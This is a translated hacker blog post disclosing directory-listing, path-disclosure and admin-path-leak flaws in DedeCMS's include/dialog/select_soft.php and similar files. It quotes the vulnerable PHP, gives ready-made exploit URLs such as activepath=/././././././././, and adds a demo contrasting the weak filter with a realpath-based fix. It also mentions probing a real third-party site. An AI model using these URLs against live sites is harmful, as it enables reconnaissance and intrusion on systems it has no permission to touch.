Author: st0p

Putting this on record. Hey, this hole was found together with Jack. It is a pretty YD find, but it also helped me get ROOT privileges twice. The vulnerability was found by st0p and Jack; no copyright claimed, feel free to reprint! Why call it XDAY rather than 0DAY? Because this hole is rather messy: it covers many versions but is of limited use, quite tasteless, although used well it can still have a little effect.

While I was bored, Jack sent me a message saying he had found a rather tasteless thing in DedeCMS: the file include/dialog/select_soft.php can disclose the DedeCMS admin (background) directory. In older versions it can even be accessed directly, skipping the login check with no need for an administrator account; in the new version it redirects straight to the admin login. After reading the message I got a YD idea: the official site must have it too, so I opened it right away. Unfortunately the official site prompts you to enter the admin directory instead of redirecting, as shown in Figure 1.

(Figure 1: dedecms-xday1)

Disappointing. But while chatting with Jack I learned that Safety in China has this problem, so I opened that one, and it really did redirect, as shown in Figure 2.

(Figure 2: dedecms-xday2)

See: the admin address is article_6565998um9)-_ and the title bar shows delphi V53_1_GBK, a DELPHI system. Next, on to DedeCMS itself. Since the problem exists, I hurried to download three versions from the official site: the latest DedeCMS V5.5 official release, DedeCMS V5.3.1 and DedeCmsV5.1FreeSP1. I set each up locally and went over the select_soft.php file in each, which turned up something more interesting. First let's look at DedeCmsV5.1FreeSP1; the key code is in include/dialog/select_soft.php:


```php
<?php
require_once(dirname(__FILE__)."/config.php"); // this is where the login check happens

if(empty($activepath)) $activepath = "";

$activepath = str_replace("..","",$activepath); // filters out ".." but does not filter "."
$activepath = ereg_replace("^/{1,}","/",$activepath);
if(strlen($activepath)<strlen($cfg_soft_dir))
{
    $activepath = $cfg_soft_dir;
}
// If the path value is shorter than $cfg_soft_dir, $activepath is set to $cfg_soft_dir
// (the system default is /uploads/soft). Pay attention here: a value longer than
// $cfg_soft_dir skips this branch entirely. $cfg_soft_dir is defined in include/config_base.php.

$inpath = $cfg_basedir.$activepath;
$activeurl = "..".$activepath;
if(empty($f)) $f="form1.enclosure";

if(empty($comeback)) $comeback = "";

// Test user login status
$cuserLogin = new userLogin();
if($cuserLogin->getUserID()==-1)
{
    if($cuserLogin->adminDir=="")
    {
        exit('Request Error!');
    }
    $gurl = "../../{$cuserLogin->adminDir}/login.php?gotopage=".urlencode($dedeNowurl);
    // quack, look here: if you are not logged in it redirects you to our lovely admin login address
    echo "<script language='javascript'>location='$gurl';</script>";
    exit();
}
```


Although DedeCMS provides a function to rename the admin directory, the include/dialog/config.php problem still discloses the admin path. Now for the other interesting part. Reading the include/dialog/select_soft.php source, we see that "/" is not filtered, so we construct activepath=a/aaa and see what happens: because of the length check that follows, it is replaced by /uploads/soft and the attempt fails. Some friends may think of simply constructing a value longer than $cfg_soft_dir, such as /include/FCKeditor, which can then be browsed. Visiting http://target.com/include/dialog/select_soft.php?activepath=/include/FCKeditor gives the result shown in Figure 3.

(Figure 3: dedecms-xday3)

See, the jump succeeds, but that is of no use to us. What we want is to jump to the root directory. After some trying, st0p found that this version can indeed do it. ".." is filtered but "." is not; the only obstacle is the length check on $activepath, which, when the value is too short, leaves you in the /uploads/soft directory. So we add a run of "./" and try again, and /././././././././ skips out successfully. Visiting http://target.com/include/dialog/select_soft.php?activepath=/././././././././ gives Figure 4.

(Figure 4: dedecms-xday4)

See, it lists every file under the root directory, PHP files included, although their contents cannot be viewed. Moreover, when DedeCMS is pointed at a non-existent directory it prints an error message, so we can also construct any directory name longer than $cfg_soft_dir and disclose the absolute path. For example, visit http://target.com/include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p; the result is shown in Figure 5.

(Figure 5: dedecms-xday5)

Then I looked at DedeCMS V5.3.1 and the latest DedeCMS V5.5 official release, and found that both have been patched: they only list directories and certain files that are allowed to be displayed, and PHP files are not shown. include/dialog/select_soft.php:

```php
<?php
require_once(dirname(__FILE__)."/config.php"); // this is where the login check happens
if(empty($activepath))
{
    $activepath = '';
}
$activepath = str_replace('.','',$activepath); // see? here the ".." filter has become a "." filter

$activepath = ereg_replace("/{1,}",'/',$activepath);

if(strlen($activepath) < strlen($cfg_soft_dir))
{
    $activepath = $cfg_soft_dir;
}
// But this length check is still the only gate and filters nothing else, hehe, so we can still use it
$inpath = $cfg_basedir.$activepath;
$activeurl = '..'.$activepath;
if(empty($f))
{
    $f='form1.enclosure';
}

if(empty($comeback))
{
    $comeback = '';
}
```



So constructing http://target.com/include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p still discloses the absolute path, and constructing http://target.com/include/dialog/select_soft.php?activepath=/include/FCKeditor lets you browse the files under that directory. Of course you can jump to other directories as well, as long as the value is longer than the configured directory. The catch is that you have to be logged in to use it, which makes it seem a bit tasteless. Jack says: what if you pair it with an injection vulnerability... GA.... and
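As an added example (my code, not DedeCMS's), here is the V5.1 select_soft.php logic quoted above reproduced as weak_activepath(), beside a hardened safe_activepath() that resolves the requested path with realpath() and only accepts it if it stays inside $cfg_soft_dir. The function names and the temp-directory layout are constructed for the demo; it covers both the "/./" bypass in V5.1 and the other-directory listing and absolute-path disclosure that remain in V5.3.1 and V5.5.

```php
<?php
// Added example, not DedeCMS code. weak_activepath() mirrors the V5.1 logic quoted
// above; safe_activepath() is a hardened replacement. Paths are constructed in a temp dir.

// V5.1 logic: strip "..", collapse leading slashes, and fall back to the default only
// when the value is *shorter* than $cfg_soft_dir. "." and "/" survive untouched.
function weak_activepath(string $activepath, string $cfg_soft_dir): string {
    $activepath = str_replace('..', '', $activepath);
    $activepath = preg_replace('#^/+#', '/', $activepath); // ereg_replace no longer exists in PHP 7+
    if (strlen($activepath) < strlen($cfg_soft_dir)) {
        $activepath = $cfg_soft_dir;
    }
    return $activepath;
}

// Hardened check: resolve the candidate on disk, then require it to be the upload
// directory itself or a descendant of it. Traversal sequences, other directories and
// non-existent probes (the absolute-path leak) all collapse to the default.
function safe_activepath(string $activepath, string $cfg_basedir, string $cfg_soft_dir): string {
    $base = realpath($cfg_basedir);
    $root = realpath($cfg_basedir . $cfg_soft_dir);
    $cand = realpath($cfg_basedir . '/' . ltrim($activepath, '/'));
    if ($base === false || $root === false || $cand === false) {
        return $cfg_soft_dir;
    }
    $inside = ($cand === $root)
        || strncmp($cand, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) === 0;
    if (!$inside) {
        return $cfg_soft_dir;
    }
    // Return a web-root-relative path in the form the rest of the script expects.
    return str_replace(DIRECTORY_SEPARATOR, '/', substr($cand, strlen($base)));
}

// Constructed layout: <tmp>/uploads/soft/sub and <tmp>/include/FCKeditor.
$cfg_basedir  = sys_get_temp_dir() . '/dede_demo_' . getmypid();
$cfg_soft_dir = '/uploads/soft';
mkdir($cfg_basedir . '/uploads/soft/sub', 0700, true);
mkdir($cfg_basedir . '/include/FCKeditor', 0700, true);

$probes = ['/././././././././', '/include/FCKeditor', '/st0pst0pst0pst0pst0pst0pst0pst0p', '/uploads/soft/sub'];
foreach ($probes as $p) {
    printf("%-34s weak=%-34s safe=%s\n", $p,
        weak_activepath($p, $cfg_soft_dir),
        safe_activepath($p, $cfg_basedir, $cfg_soft_dir));
}
```

The first three probes pass the weak filter unchanged, while safe_activepath() returns /uploads/soft for all of them and only passes /uploads/soft/sub through.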

In addition, some older versions of DedeCMS display this page directly when accessed, skipping the login check entirely, and /././././././././ can likewise be used to jump out to the root directory. The access address in these versions is somewhat different, however: http://target.com/require/dialog/select_soft.php?activepath=/././././././././

Hehe, finally I found that several other files in the include\dialog\ directory have the same problem, just with a different default directory; with some of them the HTML of the files can be viewed. The files with the same problem are include\dialog\select_images.php, include\dialog\select_media.php and include\dialog\select_templets.php.